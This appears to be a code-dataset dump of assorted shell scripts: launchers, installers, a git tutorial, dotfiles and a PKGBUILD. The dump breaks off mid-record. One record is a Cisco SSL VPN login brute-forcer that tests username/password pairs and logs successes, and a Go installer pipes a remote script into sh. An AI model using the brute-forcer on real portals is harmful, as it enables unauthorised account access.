blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
87a2d2c78f2a12618449c4ad472c6afc930c09e2
|
Shell
|
scriptlib/sh
|
/totalcmd
|
UTF-8
| 991
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh
###totalcmd v0.1
### - totalcmd
### - Written by duel, 2008-12-24
###Usage:
### totalcmd
###Option:
### -h Display help text
###Example:
### totalcmd
#resume=`/myplace/wine/bin/get-appdefault.pl "TotalCmd.exe"`
#/myplace/wine/bin/del-appdefault.pl "TotalCmd.exe"
#/myplace/wine/bin/set-appdefault.pl "TotalCmd.exe" browseui,ole32,oleaut32,rpcrt4,shlwapi,msvcrt=b | regedit -
#sleep 1
#DLLOVERRIDES='rpcrt4=b' cn_wine 'R:\Program\Fileman\TotalCmd\TotalCmd.exe'
#sleep 1
#echo -E "$resume" | regedit -
arch=32
if [ "AMD64" = "$PROCESSOR_ARCHITEW6432" ] ; then arch=64 ; fi
if [ "AMD64" = "$PROCESSOR_ARCHITECTURE" ] ; then arch=64 ; fi
if [ "$arch" = "64" ] ; then
appdir=`cygpath -u "$FS_SYSTEM_APP"`
appname="totalcmd64.exe"
else
appdir=`cygpath -u "$FS_SYSTEM"`
appdir="$appdir/app32"
appname="totalcmd.exe"
fi
app="$appdir/fileman/totalcmd/$appname"
echo $app "$@"
if [ "$OSTYPE" == "cygwin" ] ; then
exec "$app" "$@" &
else
exec cn_wine "$app" "$@"
fi
| true
|
6c0e9d409e22e0fdd445f014f92886a3f55dca4d
|
Shell
|
castocolina/scripts
|
/common/install_golang.sh
|
UTF-8
| 1,405
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
BASEDIR=$(dirname "$0")
sudo echo "Test sudo"
source $BASEDIR/install_func.sh
source $MY_SH_CFG_FILE
MY_OS=$(get_os)
echo
echo $SEPARATOR
echo ">>>>> GOLANG ................"
echo $SEPARATOR
echo -n "UPDATE? (y/n) > "
read to_update
exist_cmd go || brew install golang
exist_cmd go && is_true $to_update && brew upgrade golang;
exist_cmd go && is_true $to_update && {
mkdir -p $HOME/go;
GOLANG_CONFIG=$(cat <<'EOF'
export GOPATH="$HOME/go";
export PATH="$PATH:$GOPATH/bin";
EOF
);
find_append $MY_SH_CFG_FILE "GOPATH=" "$GOLANG_CONFIG"
source $MY_SH_CFG_FILE
mkdir -p $GOPATH/src $GOPATH/pkg $GOPATH/bin
curl https://raw.githubusercontent.com/golang/dep/master/install.sh | sh
go get -u -v github.com/rakyll/gotest
#Go debugger
go get -u -v github.com/go-delve/delve/cmd/dlv;
# Go lint
go get -u -v github.com/golangci/golangci-lint/cmd/golangci-lint;
go get -u -v github.com/ramya-rao-a/go-outline;
go get -u -v github.com/rogpeppe/godef;
go get -u -v github.com/uudashr/gopkgs/cmd/gopkgs;
go get -u -v github.com/sqs/goreturns;
go get -u -v github.com/mdempsky/gocode;
go get -u -v github.com/vektra/mockery;
go get -u -v github.com/golang/mock/gomock;
go get -u -v github.com/matryer/moq;
go get -u -v golang.org/x/tools/cmd/gorename;
go install github.com/golang/mock/mockgen;
};
echo ":: $SEPARATOR"
go version
echo ":: $SEPARATOR"
| true
|
62a8901f5a27f6bb0a9ddbde55c783d62f031905
|
Shell
|
mikhbur/conformer
|
/modules/CiscoSSLVPN.sh
|
UTF-8
| 5,946
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
check_ciscoSSLVPN(){
old_ver=false;
check_Portal=$(wget --timeout=4 -qO- https://$1/+CSCOE+/logon.html --no-check-certificate);
if ([ "$(echo "$check_Portal" | grep 'name="username"')" ] && [ "$(echo "$check_Portal" | grep 'name="password"')" ] && [ "$(echo "$check_Portal" | grep 'name="Login"')" ]) || [[ $(echo "$5" | tr '[:upper:]' '[:lower:]' ) == "disable_check" ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] ; then
:
else
#Check for older version 2010?
check_Portal=$(wget --timeout=4 -qO- https://$1/webvpn.html --no-check-certificate);
if ([ "$(echo "$check_Portal" | grep "username")" ] && [ "$(echo "$check_Portal" | grep "password")" ] && [ "$(echo "$check_Portal" | grep "Login")" ]) || [[ $(echo "$5" | tr '[:upper:]' '[:lower:]' ) == "disable_check" ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "disable_check" ]] ; then
old_ver=true;
echo "";
echo "***This Version of CiscoSSLVPN is older, Module for this portal is incomplete and might show false positives***";
echo "";
else
echo "Either not a CiscoSSLVPN portal, or not compatible version.";
echo "Exiting...";
exit 1;
fi
fi
}
POST_ciscoSSLVPN(){
LOG_YES=false;
LOG=/tmp/conformer.log;
#Determine if Logging, and where to log
if [[ $(echo "$5" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "log="* ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "log="* ]]; then
LOG_YES=true;
LOG=$(echo "$5" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$6" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$7" | grep -i log | cut -d "=" -f 2);
if [[ "$LOG" == "" ]] ; then
LOG=$(echo "$8" | grep -i log | cut -d "=" -f 2);
fi
fi
fi
if [[ -d "$LOG" ]] ; then
LOG_YES=false;
fi
fi
DEBUG_YES=false;
DEBUG=/tmp/conformer.debug;
#Determine if Debuging, and where to debug to.
if [[ $(echo "$5" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$6" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$7" | tr '[:upper:]' '[:lower:]') == "debug="* ]] || [[ $(echo "$8" | tr '[:upper:]' '[:lower:]') == "debug="* ]]; then
DEBUG_YES=true;
DEBUG=$(echo "$5" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$6" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$7" | grep -i debug | cut -d "=" -f 2);
if [[ "$DEBUG" == "" ]] ; then
DEBUG=$(echo "$8" | grep -i debug | cut -d "=" -f 2);
fi
fi
fi
if [[ -d "$DEBUG" ]] ; then
DEBUG_YES=false;
fi
fi
#check which version.
if [[ "$old_ver" != true ]] ; then
#Curl sends POST parameters to SSLVPL Portal
POST=$(curl -i -s -k -X $'POST' \
-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Referer: https://'$1'/+CSCOE+/logon.html?a0=15&a1=&a2=&a3=1' -H $'Content-Type: application/x-www-form-urlencoded' \
-b $'webvpnlogin=1; webvpnlogin=1; webvpnLang=en' \
--data-binary $'tgroup=&next=&tgcookieset=&username='$line'&password='$pass'&Login=Login' \
$'https://'$1'/+webvpn+/index.html');
#If Logging is enabled loop userlist
if [[ $DEBUG_YES == true ]]; then
echo "host:$1 username:$line password:$pass" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "$POST" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "-------------------------------------------------------------" >> "$DEBUG";
fi
#checks if cookies returned or left empty or if default return html presented.
if [[ $POST != *"webvpnc=;"* ]] && [[ $POST == *"webvpnc="* ]] ; then
echo " $line:$pass:**Success**";
# Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:**Success**" >> "$LOG";
fi
elif [[ $POST != *"webvpnc=;"* ]]; then
echo " $line:$pass:Fail --- Page not responding properly.";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail --- Page not responding properly." >> "$LOG";
fi
else
echo " $line:$pass:Fail";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail" >> "$LOG";
fi
fi
else #Older version POST.
#Curl sends POST parameters to older SSLVPL Portal
POST=$(curl -i -s -k -X $'POST' \
-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H $'Referer: https://'$1'/webvpn.html' -H $'Content-Type: application/x-www-form-urlencoded' \
-b $'webvpncontext=00@websslvpn; webvpnlang=1; stStarted=0' \
--data-binary $'username='$line'&password='$pass'&Login=Login&next=' \
$'https://'$1'/webvpn.html');
#If Logging is enabled loop userlist
if [[ $DEBUG_YES == true ]]; then
echo "host:$1 username:$line password:$pass" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "$POST" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "" >> "$DEBUG";
echo "-------------------------------------------------------------" >> "$DEBUG";
fi
if [[ $POST == *"msgLoginFail"* ]] ; then
echo " $line:$pass:Fail";
#Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail" >> "$LOG";
fi
elif [[ $POST != *"msgLoginFail"* ]] && [[ $POST != "" ]] ; then
echo " $line:$pass:**Success**";
# Logging
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:**Success**" >> "$LOG";
fi
else
echo " $line:$pass:Fail --- Page not responding properly.";
if [[ $LOG_YES == true ]]; then
echo " $line:$pass:Fail --- Page not responding properly." >> "$LOG";
fi
fi
fi
}
| true
|
2d4777262eeda1c5059c7f9bd43510ba9bc5caa5
|
Shell
|
saurabhnikam1997/ProgrammingConstructs11
|
/@Day7/Secndlargesmallwtsort.sh
|
UTF-8
| 969
| 4
| 4
|
[] |
no_license
|
#! /bin/bash -x
declare -a array
function numberGenerate()
{
for (( i=0; i<10; i++ ))
do
number=$(((RANDOM %900)+100))
array[i]=$number
done
echo
echo Generate Array.. ${array[@]}
echo
}
function SecondLargest()
{
largest=$1
SecondLargest=$1
for m in $*
do
if [[ $m -gt $largest ]]
then
SecondLargest=$largest
largest=$m
elif [[ $m -gt SecondLargest ]]
then
SecondLarest=$m
fi
done
echo Largest Element Of Array Is.. $largest
echo Sdcond Largest Element Of Array Is.. $SecondLargest
echo
}
function SecondSmallest
{
smallest=$1
SecondSmallest=$1
for m in $*
do
if [[ $m -lt $smallest ]]
then
SecondSmallest=$smallest
smallest=$m
elif [[ $m -lt SecondSmallestm ]]
then
SecondSmallest=$m
fi
done
echo Samllest Element Of Array Is.. $smallest
echo Second Smallest Element of Array Is.. $SecondSmallest
echo
}
numberGenerate
SecondLargest ${array[@]}
SecondSmallest ${array[@]}
| true
|
373f3e984fb8d65cb31095740f28c0ba16602593
|
Shell
|
petronny/aur3-mirror
|
/lzma-sdk/PKGBUILD
|
UTF-8
| 1,644
| 2.625
| 3
|
[] |
no_license
|
pkgname=lzma-sdk
pkgver=9.22
pkgrel=1
pkgdesc="The LZMA SDK provides the libraries you need to develop applications that use LZMA compression."
url="http://www.7-zip.org/sdk.html"
arch=(any)
license=("public domain")
makedepends=(java-environment mono)
conflicts=(lzma)
optdepends=("java-environment: Java SDK"
"mono: .NET SDK")
source=("http://downloads.sourceforge.net/sevenzip/lzma${pkgver//./}.tar.bz2"
"SevenZip.snk"
"sevenzip.pc")
sha1sums=('fbe4d6c02202d65fae75c2db0e3cdc542ca41e6d'
'eaa62fd2889445845c73645f188c189d2227c3df'
'd1c5afd480d664634b0d46d3156bbe762435a2f6')
prepare() {
cd "$srcdir"
rm CS/7zip/Common/CommandLineParser.cs
rm Java/SevenZip/Lzma{Alone,Bench}.java
}
build() {
cd "$srcdir/CS/7zip"
mcs /out:SevenZip.dll /keyfile:../../SevenZip.snk /t:library /debug:pdbonly /optimize \
ICoder.cs `ls Common/*.cs` `ls Compress/LZ/*.cs` `ls Compress/LZMA/*.cs` `ls Compress/RangeCoder/*.cs`
cd ../../Java/SevenZip
mkdir .build
javac -d .build *.java Compression/LZ/*.java Compression/LZMA/*.java Compression/RangeCoder/*.java
cd .build
jar cvf 7zip.jar SevenZip/Compression/LZ SevenZip/Compression/LZMA SevenZip/Compression/RangeCoder \
SevenZip
}
package() {
cd "$srcdir/CS/7zip"
find . -name '*.dll*' -exec install -Dm644 {} "$pkgdir/usr/lib/lzma-sdk/"{} \;
install -m644 ../../Java/SevenZip/.build/7zip.jar "$pkgdir/usr/lib/lzma-sdk/"
install -Dm644 ../../sevenzip.pc "$pkgdir/usr/lib/pkgconfig/sevenzip.pc"
find "$pkgdir/usr/lib/pkgconfig" -type f -exec sed -i "s|@VERSION@|${pkgver}|" {} \;
cd "$pkgdir/usr/lib/lzma-sdk"
gacutil -i SevenZip.dll -root "$pkgdir/usr/lib"
}
| true
|
de29af4d4dd82c91d1b3e7d95cc2a6524edf9468
|
Shell
|
pawelKapl/git-tutorial
|
/git.04.resolve.conflicts
|
UTF-8
| 4,002
| 3.375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#################################################################################
# #
# Copyright 2016 Augustyn Kończak #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
#################################################################################
##Config:
conflict="file_with_conflict";
branchname="development";
##Commands:
createbranch="git branch ${branchname}";
modifyfile="echo $(date +"%s") > ${conflict}"
add="git add ${conflict}"
commit="git commit -m \"creating conflicts\""
switchtobranch="git checkout ${branchname}"
switchtomaster="git checkout master"
merge="git merge ${branchname}";
mergetool="git mergetool meld";
##Helpers
msg01="this is example line that might generate conflicts"
msg1="echo ${msg01} > ${conflict}";
msg02="this is example line that will not gnerate conflicts"
msg2="echo ${msg02} > ${conflict}";
msg03="this is line that will cause all conflicts"
msg3="echo ${msg03} > ${conflict}";
meld="$(whereis meld|awk -F':' '{print $2}')";
if [ "x$meld" == "x" ]; then
meld="vimdiff";
else
meld="meld";
fi
timestamp=$(date +"%H%M%S");
esc="\033[0m"
command="\033[36;40m"
bashtxt="\033[37;40m";
bold="\033[31;40m";
soft="\033[33;40m"
echo -e "\n\033[32;40;1mResolving conflicts${esc}\n"
echo -e "${strong}Conflict${esc} is when we have change to the ${soft}same file${esc}, the ${soft}same line${esc}, it two diffrent branches.";
echo -e "Not as uncommon as one would like\n";
read;
echo -e "We are going to generate conflict so you can learn how to deal with it in git";
echo -e "This script will create new branch ${soft}${branchname}${esc} with file ${soft}${conflict}${esc} to create within conflict";
echo -e "Than it will change the same file in master branch so we acctually ${soft}have${esc} conflict";
echo -e "Preforming magic, please wait...\n";
echo -e "$(eval ${createbranch}) $(eval ${switchtobranch})";
echo -e "$(eval ${msg1})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
sleep 2;
echo -e "$(eval ${msg2})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
sleep 2;
echo -e "$(eval ${switchtomaster})";
echo -e "$(eval ${msg3})";echo -e "$(eval ${add})";echo -e "$(eval ${commit})";
echo -e "\nWe should have conflict now, when we try to perform merge of two branches. To do merge of ${branchname} to master use command ${command}${merge}${esc}.\nWe'll try this now.\nHold your fingers for me ;)";
read;
echo -e "$(eval ${merge})";
echo -e "\nSo, let's fire ${soft}mergetool${esc}\nI'm lazy, so I'll try to use graphical tool. You can of course use your favourite ${soft}vimdiff${esc}";
echo -e "Nevertheless, git writes about possible mergetools just after invoking ${command}${merge}${esc}"; echo -e "$(eval ${mergetool})";
read;
if [ -f git.05.working.with.multiple.repositories ];then
. git.05.working.with.multiple.repositories;
else
. ../git.05.working.with.multiple.repositories;
fi
| true
|
8eccde26bda9d3885031ef1a08e8be2477815a4a
|
Shell
|
CrunchyData/crunchy-containers
|
/bin/postgres_common/postgres/custom-configs.sh
|
UTF-8
| 1,002
| 3.390625
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
CRUNCHY_DIR=${CRUNCHY_DIR:-'/opt/crunchy'}
source "${CRUNCHY_DIR}/bin/common_lib.sh"
enable_debugging
function custom_config() {
src=${1?}
dest=${2?}
mode=${3?}
if [[ -f ${src?} ]]
then
echo_info "Custom ${src?} detected. Applying custom configuration.."
cp ${src?} ${dest?}
err_check "$?" "Applying custom configuration" "Could not copy ${src?} to ${dest?}"
chmod ${mode?} ${dest?}
err_check "$?" "Applying custom configuration" "Could not set mode ${mode?} on ${dest?}"
fi
}
custom_config "/pgconf/postgresql.conf" "${PGDATA?}/postgresql.conf" 600
custom_config "/pgconf/pg_hba.conf" "${PGDATA?}/pg_hba.conf" 600
custom_config "/pgconf/pg_ident.conf" "${PGDATA?}/pg_ident.conf" 600
custom_config "/pgconf/server.key" "${PGDATA?}/server.key" 600
custom_config "/pgconf/server.crt" "${PGDATA?}/server.crt" 600
custom_config "/pgconf/ca.crt" "${PGDATA?}/ca.crt" 600
custom_config "/pgconf/ca.crl" "${PGDATA?}/ca.crl" 600
| true
|
575f16876959d561efeac748567ebdd2fbe242dd
|
Shell
|
kevincoakley/workbench-helm-chart
|
/generate-self-signed-cert.sh
|
UTF-8
| 892
| 4.28125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# This script will generate a self-signed TLS certificate for the given domain. If no domain is specified, the user will be prompted for one.
#
# Usage: ./generate-self-signed-cert.sh [domain]
#
ECHO="echo -e"
domain="$1"
mkdir -p certs/
if [ "$domain" == "" ]; then
$ECHO "Please specify a domain for your new certificate."
read -p "Domain: " domain
fi
# Still no domain? Exit with error..
if [ "$domain" == "" ]; then
$ECHO "You must specify a domain"
exit 1
fi
if [ ! -f "certs/${domain}.cert" ]; then
$ECHO "\nGenerating self-signed certificate for $domain"
openssl req -new -x509 -nodes -sha1 -days 3650 -subj "/C=US/ST=IL/L=Champaign/O=NCSA/OU=NDS/CN=*.$domain" -newkey rsa:2048 -keyout "certs/$domain.key" -out "certs/$domain.cert"
else
$ECHO "Certificate already exists for $domain... skipping generation of self-signed certificate"
fi
| true
|
8c1a461051d4e3681d22e0cd5a6ef023b8cb1f3c
|
Shell
|
MeiChihChang/Applied-Security-Lab-Student-Project-ETHZ
|
/scripts/export.sh
|
UTF-8
| 678
| 2.96875
| 3
|
[] |
no_license
|
# WINDOWS SCRIPT change VBoxManage.exe for vboxmanage in Linux
# comment this is VManage.exe is in the path
cd 'C:\Program Files\Oracle\VirtualBox\'
VBoxManage.exe list vms | tac
echo "-"
for vm in `VBoxManage.exe list vms | tac`;
do
for i in $(echo $vm | tr " " "\n")
do
if [[ $i == *"host"* || $i == *"firewall"* || $i == *"client"* || $i == *"admin"* ]]; then
echo $i
#printf "Halting $vm\n"
#VBoxManage.exe controlvm "$i" acpipowerbutton 2> /dev/null
#printf "Exporting $vm\n"
#VBoxManage.exe export "$i" -o "./build/$i.ova"
fi
done
done
$SHELL
| true
|
bc26a8d2cb8a82c1ecf97e3e0a6a7c75191fbcc0
|
Shell
|
aaronzirbes/httpie-json-scripts
|
/find
|
UTF-8
| 656
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
. host.include
countStr=3
service=$1
lat=$2
lon=$3
if [ "$service" == "" ]; then
echo "You must supply a service name"
exit 1
fi
if [ "$lat" == "" ]; then
echo "You must supply a latitude and longitude"
lat=45.831335
lon=-95.383322
echo " for example: ./find dealer $lat $lon"
exit 1
fi
if [ "$lon" == "" ]; then
echo "You must supply a latitude and longitude"
exit 1
fi
path="/by-location/${countStr}@${lat},${lon}"
# https://github.com/jkbr/httpie
BASE_URL=`getUrl entity-gateway ${service}`/${service}s
echo "http GET ${BASE_URL}${path} ${HEADERS}"
time http GET ${BASE_URL}${path} ${HEADERS}
| true
|
f83560238afeeb2f8e977051b095b95d3baddd39
|
Shell
|
ValdrST/vrtg
|
/crearSitio.sh
|
UTF-8
| 2,016
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Solicita la IP
echo "Indique el número de servidor:"
echo "1. venganzaiii.somch.org"
echo "2. somch.org"
read numeroServidor
# Determina si el Servidor es válido
case ${numeroServidor} in
"1")
ip=venganzaiii.somch.org
;;
"2")
ip=somch.org
;;
*)
echo "Servidor no válido"
exit 1
;;
esac
# Solicita el puerto
echo "***********************************"
echo "Puerto [8008,8009,8010,8011,8012,8013,8014,8015,8016,8017]:"
read numeroPuerto
# Determina si el puerto esta disponible
estadoPuerto=`netstat -tuln | grep LISTEN | grep -c :$numeroPuerto`
if [ $estadoPuerto -ge 1 ]
then
echo "Abortando: El puerto $numeroPuerto ya se encuentra en uso"
exit 1
fi
cp vrtgd.service /etc/systemd/system/
systemctl daemon-reload
sudo systemctl start vrtgd
sudo systemctl enable vrtgd
# Solicita Directorio para nuevo sitio
echo "***********************************"
echo "Directorio para el sitio a crear:"
read nombreDirectorio
# Genera nombre de los archivos
archivoConfiguracionNGINX=/etc/nginx/sites-available/$nombreDirectorio-proxy.conf
directorioSitioNGINX=/usr/share/nginx/html/$nombreDirectorio-proxy
touch $archivoConfiguracionNGINX
rm -rf $archivoConfiguracionNGINX
rm -rf $directorioSitioNGINX
# Crea el archivo de configuración NGINX del sitio
echo "server{
listen $numeroPuerto;
server_name $ip;
location /vrtg {
proxy_pass http://unix:/run/waitress/vrtg.sock;
}
}" > $archivoConfiguracionNGINX
# Crea la carpeta de trabajo de NGINX
mkdir $directorioSitioNGINX
# Crea el enlace simbolico
sitesEnabledConfig="/etc/nginx/sites-enabled/$nombreDirectorio-proxy.conf"
if [ -d $sitesEnabledConfig ];then
rm $sitesEnabledConfig
fi
sitesAvailableConfig="/etc/nginx/sites-available/$nombreDirectorio-proxy.conf"
ln -s $sitesAvailableConfig $sitesEnabledConfig
# Ajusta permisos
chown -R http:http $directorioSitioNGINX
chmod 750 $directorioSitioNGINX
# Reinicia el servicio de NGINX
systemctl reload nginx
| true
|
bbae554f30cf669ae4db21651156ca8b52f1be0c
|
Shell
|
DeltaF1/noodle
|
/build.sh
|
UTF-8
| 420
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh -e
echo "Cleaning.."
rm -rf bin
mkdir bin
echo "Assembling.."
uxnasm src/main.tal bin/noodle.rom
echo "Installing.."
if [ -d "$HOME/roms" ] && [ -e ./bin/noodle.rom ]
then
cp ./bin/noodle.rom $HOME/roms
echo "Installed in $HOME/roms"
fi
if [ "${1}" = '--push' ];
then
echo "Pushing.."
~/Applications/butler push bin/noodle.rom hundredrabbits/noodle:uxn
fi
echo "Running.."
uxnemu bin/noodle.rom
| true
|
6d4ff9ff2a69d9e03c214ccf81364f7422aed086
|
Shell
|
bargassa/Stop4Body
|
/Macros/StepN_BDTOutFits.sh
|
UTF-8
| 722
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
. setupJSONs.sh
. setupPaths.sh
INPUT=${TEST_DIR}_bdt/
OUTPUT=~cbeiraod/local-area/Stop4Body/BDT_Fits/
OUTPUT_INJ=~cbeiraod/local-area/Stop4Body/BDT_Fits_Injected/
OUTPUT_DAT=~cbeiraod/local-area/Stop4Body/BDT_Fits_Data/
if [[ ! -d ${OUTPUT} ]] ; then
mkdir -p ${OUTPUT}
fi
if [[ ! -d ${OUTPUT_INJ} ]] ; then
mkdir -p ${OUTPUT_INJ}
fi
if [[ ! -d ${OUTPUT_DAT} ]] ; then
mkdir -p ${OUTPUT_DAT}
fi
BDTStudy --json ${JSON_PATH}/plot2016_LO.json --outDir ${OUTPUT_DAT} --inDir ${INPUT} --suffix bdt
BDTStudy --json ${JSON_PATH}/plot2016_PDInj_LO.json --outDir ${OUTPUT_INJ} --inDir ${INPUT} --suffix bdt
BDTStudy --json ${JSON_PATH}/plot2016_PD_LO.json --outDir ${OUTPUT} --inDir ${INPUT} --suffix bdt
| true
|
00516b952b61f123f3d554c70fc4549cef6c6873
|
Shell
|
abitwise/dotfiles
|
/.bash_profile
|
UTF-8
| 3,657
| 3.171875
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
# Add /usr/local/sbin to path
export PATH=/usr/local/sbin:$PATH;
# Add `~/bin` to the `$PATH`
export PATH="$HOME/bin:$PATH";
# Add Python 3 bins to path
export PATH="$HOME/Library/Python/3.6/bin:$PATH";
# Load the shell dotfiles, and then some:
# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{path,bash_prompt,exports,aliases,functions,extra}; do
[ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob;
# Append to the Bash history file, rather than overwriting it
shopt -s histappend;
# Autocorrect typos in path names when using `cd`
shopt -s cdspell;
# Enable some Bash 4 features when possible:
# * `autocd`, e.g. `**/qux` will enter `./foo/bar/baz/qux`
# * Recursive globbing, e.g. `echo **/*.txt`
for option in autocd globstar; do
shopt -s "$option" 2> /dev/null;
done;
# Add tab completion for many Bash commands
if which brew &> /dev/null && [ -r "$(brew --prefix)/etc/profile.d/bash_completion.sh" ]; then
# Ensure existing Homebrew v1 completions continue to work
export BASH_COMPLETION_COMPAT_DIR="$(brew --prefix)/etc/bash_completion.d";
source "$(brew --prefix)/etc/profile.d/bash_completion.sh";
elif [ -f /etc/bash_completion ]; then
source /etc/bash_completion;
fi;
# Enable tab completion for `g` by marking it as an alias for `git`
if type _git &> /dev/null; then
complete -o default -o nospace -F _git g;
fi;
# Add tab completion for SSH hostnames based on ~/.ssh/config, ignoring wildcards
[ -e "$HOME/.ssh/config" ] && complete -o "default" -o "nospace" -W "$(grep "^Host" ~/.ssh/config | grep -v "[?*]" | cut -d " " -f2- | tr ' ' '\n')" scp sftp ssh;
# Add tab completion for `defaults read|write NSGlobalDomain`
# You could just use `-g` instead, but I like being explicit
complete -W "NSGlobalDomain" defaults;
# Add `killall` tab completion for common apps
complete -o "nospace" -W "Contacts Calendar Dock Finder Mail Safari iTunes SystemUIServer Terminal Twitter" killall;
# Python environment for Mac
#VIRTUALENVWRAPPER_PYTHON=/usr/local/bin/python3;
#export WORKON_HOME=$HOME/.virtualenvs;
#export PROJECT_HOME=$HOME/dev;
#source /usr/local/bin/virtualenvwrapper.sh;
# Mac OS change max open files limit (first 4 lines are one-time)
# echo kern.maxfiles=65536 | sudo tee -a /etc/sysctl.conf
# echo kern.maxfilesperproc=65536 | sudo tee -a /etc/sysctl.conf
# sudo sysctl -w kern.maxfiles=65536
# sudo sysctl -w kern.maxfilesperproc=65536
ulimit -n 65536 65536;
# Increase Node.js threadpool size
export UV_THREADPOOL_SIZE=1024
# Go lang
export GOPATH=$HOME/dev/go
# Brew specific stuff
export PATH="/opt/homebrew/bin:$PATH"
eval "$(/opt/homebrew/bin/brew shellenv)"
# Bigbank specific stuff
export NODE_EXTRA_CA_CERTS="/Users/olger.oeselg/Projects/certs/Bigbank_AS_Root_CA_2016.crt";
export NVM_DIR="$HOME/.nvm"
source $(brew --prefix nvm)/nvm.sh
# Add gettext to path
export PATH="/usr/local/opt/libiconv/bin:$PATH"
export LDFLAGS="-L/usr/local/opt/libiconv/lib"
export CPPFLAGS="-I/usr/local/opt/libiconv/include"
# Set language to US English
export LC_ALL=en_US.UTF-8
export LC_CTYPE=en_US.UTF-8
# Android Studio stuff
export PATH="${HOME}/Library/Android/sdk/tools:${HOME}/Library/Android/sdk/platform-tools:${PATH}"
# Bun.js (bun.sh)
export BUN_INSTALL="$HOME/.bun"
export PATH="$BUN_INSTALL/bin:$PATH"
# Java
export PATH="/opt/homebrew/opt/openjdk/bin:$PATH"' >> /Users/olger.oeselg/.bash_profile
export CPPFLAGS="-I/opt/homebrew/opt/openjdk/include"
export JAVA_HOME=$(/Library/Java/JavaVirtualMachines/openjdk.jdk)
| true
|
3a4120852dba4f316fdc5af7e6dc2eb40ea5187e
|
Shell
|
OyugoObonyo/alx-system_engineering-devops
|
/0x04-loops_conditions_and_parsing/3-until_holberton_school
|
UTF-8
| 151
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#Using until loop to print Holberton School 10 times
i=0
until [ $i -eq 10 ]
do
echo "Holberton School"
(( i++ ))
done
| true
|
9778bf5cde6f208842e33616f7fdabf3c29e9970
|
Shell
|
StreakyCobra/aur-python-keras-git
|
/PKGBUILD
|
UTF-8
| 1,675
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Fabien Dubosson <fabien.dubosson@gmail.com>
pkgbase="python-keras-git"
pkgname=("python-keras-git" "python2-keras-git")
_pkgname="keras"
pkgver=1.2.0.r106.ge54d7951
pkgrel=1
pkgdesc="Deep Learning library (convnets, recurrent neural networks, and more)"
arch=('i686' 'x86_64')
url="https://github.com/fchollet/keras"
license=('MIT')
makedepends=('git'
'python' 'python-setuptools'
'python2' 'python2-setuptools'
)
changelog="ChangeLog"
source=("${_pkgname}::git+http://github.com/fchollet/${_pkgname}.git")
sha256sums=('SKIP')
pkgver() {
cd "$_pkgname"
git describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
prepare() {
cd "$srcdir/"
